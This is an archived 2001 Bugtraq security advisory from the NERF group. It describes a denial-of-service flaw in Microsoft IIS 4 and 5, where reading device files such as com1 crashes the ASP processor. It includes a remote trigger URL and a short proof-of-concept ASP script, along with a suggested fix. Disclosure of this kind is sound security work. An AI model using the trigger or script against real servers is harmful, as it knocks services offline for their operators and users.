[21344] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

NERF Advisory #4: MS IIS local and remote DoS

daemon@ATHENA.MIT.EDU (VIPER_SV /nerf/team/)
Wed Jul 4 17:53:20 2001

From: VIPER_SV /nerf/team/ <hax@r.dot>
To: bugtraq@securityfocus.com
Date: Wed, 4 Jul 2001 23:35:27 +0700
Content-Type: text/plain
MIME-Version: 1.0
Message-Id: <01070423400800.01531@localhost.localdomain>
Content-Transfer-Encoding: 8bit

                              --== NERF gr0up security advisory #4 ==--  
                                  MS IIS local and remote DoS      

1. Vulnerable soft: IIS 4,5   

2. Description:
Openning and reading of device files (com1, com2, etc.) using Scripting.FileSystemObject will crash ASP-processor (asp.dll).

3. Local exploit:
If you have permission on creating .asp-file, you can crash ASP-processor.

4. Remote exploit:
Sometimes filename passing as asp-script param, which open and read data from file. Passing param as device file will
crash asp-processor.
http://host.int/scripts/script.asp?script=com1

5. Solution:
Fix Scripting.FileSystemObject (have to check file for existing before openning.

6. ASP-Exploit:

<%
  Dim strFileName, objFSO, objFile

  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

  strFileName = "com1"

  Set objFile = objFSO.OpenTextFile(strFileName)

  Response.Write objFile.ReadAll

  objFile.Close

%>

7.Sorry:
for poor english
---------------------------------------------------
Found by buggzy (buggzy@nerf.ru)
NERF Security gr0up (www.nerf.ru), Russia, 2001 (c)


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[21344] in bugtraq

NERF Advisory #4: MS IIS local and remote DoS

daemon@ATHENA.MIT.EDU (VIPER_SV /nerf/team/)Wed Jul 4 17:53:20 2001

daemon@ATHENA.MIT.EDU (VIPER_SV /nerf/team/)
Wed Jul 4 17:53:20 2001